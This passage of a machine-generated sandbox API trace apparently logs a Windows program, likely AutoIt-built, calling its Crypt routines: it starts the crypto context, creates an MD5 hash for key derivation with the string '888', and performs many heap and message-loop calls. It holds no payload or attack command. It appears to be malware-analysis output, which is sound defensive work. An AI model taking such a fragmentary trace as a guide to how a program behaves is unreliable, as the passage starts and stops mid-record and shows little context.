lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0241.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0241.388] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0241.388] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0241.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0241.388] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0241.388] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0241.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0241.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0241.389] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0241.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f041c0 [0241.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0241.389] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0241.389] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0241.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0241.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0241.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0241.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0241.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f378 [0241.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0241.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0241.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0241.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0241.389] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0241.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0241.390] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0241.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0241.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0241.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0241.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0241.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0241.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0241.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0241.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0241.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0241.390] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0241.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0241.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0241.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0241.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0241.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5d0 [0241.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0241.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0241.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0241.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0241.390] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0241.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0241.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0241.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0241.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0241.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0241.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0241.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0241.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0241.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0241.391] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0241.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0241.391] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0241.391] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0241.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0241.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04508 [0241.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0241.391] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0241.391] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0241.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0241.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0241.392] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0241.392] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0241.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04348 [0241.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0241.392] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0241.392] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0241.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0241.392] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0241.392] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0241.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0241.392] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0241.392] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0241.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0241.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0241.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0241.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f041c0 [0241.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0241.392] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0241.392] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0241.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0241.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0241.393] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0241.393] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0241.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0241.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0241.393] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0241.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0241.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0241.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0241.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0241.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0241.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0241.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51358, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0241.394] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0241.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0241.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0241.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0241.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0241.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0241.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0241.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0241.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0241.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0241.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0241.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0241.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0241.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0241.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0241.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0241.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0241.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0241.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0241.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0241.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0241.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0241.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0241.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0241.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0241.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0241.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0241.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0241.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0241.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0241.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0241.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0241.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0241.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0241.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0241.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0241.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0241.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0241.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0241.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0241.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0241.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0241.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0241.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0241.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0241.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0241.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0241.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0241.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0241.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0241.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0241.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f418 | out: hHeap=0x970000) returned 1 [0241.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0241.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0241.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0241.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0241.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0241.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0241.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0241.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0241.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0241.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0241.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0241.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0241.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0241.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0241.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0241.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0241.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0241.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0241.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0241.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0241.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0241.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0241.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0241.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0241.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0241.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0241.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0241.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0241.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0241.397] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0241.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0241.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0241.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0241.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0241.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0241.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0241.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0241.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0241.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0241.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0241.397] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0241.397] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0241.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0241.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0241.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0241.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0241.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0241.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0241.448] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0241.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0241.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0241.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0241.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0241.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0241.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0241.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0241.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0241.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0241.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0241.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0241.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f98 [0241.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0241.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0241.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0241.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 